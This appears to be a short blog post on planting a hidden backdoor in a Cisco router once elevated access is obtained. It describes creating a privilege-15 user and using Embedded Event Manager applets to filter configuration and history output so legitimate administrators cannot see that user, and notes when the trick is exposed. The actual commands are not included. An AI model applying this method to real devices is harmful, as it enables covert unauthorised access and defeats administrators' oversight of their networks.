And Yet Another Weekend Post! (YAWP)
Do you know how to create hidden users for Cisco CLI ?! If not, then this article is for you... Enjoy!
Let's assume you have got an elevated command prompt on a Cisco router, and you want to establish a permanent backdoor on the device while leaving as few markers as possible. You need to do this with existing code, and the keypoint is to change the config as little as possible.
Cisco EEM is the answer.
Cisco EEM is like a programming language built into any modern Cisco IOS router or switch. It allows for all sorts of automatic actions to take place, and it has a key feature which we’ll exploit here — it can ‘catch’ a string a user enters and transparently replace it with another string — one which we’ll instruct to exclude our ‘malicious’ pivot code.
1.Create a user with level 15 permission:
Hint: Check if the username contains the string “hidden” again, because those are the lines we are hiding from the configuration.
2. Install a couple of EEM functions:
Hide our user and history from any valid admins by proxying valid commands with commands filtered to hide our information.
There you go! You just DID it!
I know, you tried to copy and paste the code, but it did not work. I put that in PNG format so that you have to write it manually for exercise purposes! 😈
Caveats of using this method are:
If the tool uses SNMP to pull a full config, the new config will get overwritten and users become visible! If the tool is like most tools, and simply uses a service account to programmatically run “show run”, your config will stay hidden.
If you want to know more about EEM, then continue reading:
Event detectors and actions
EEM uses event detectors and actions to provide notifications of those events.
IOS Embedded Event Manager supports more than 20 event detectors that are highly integrated with different Cisco IOS Software components to trigger actions in response to network events. Some examples are: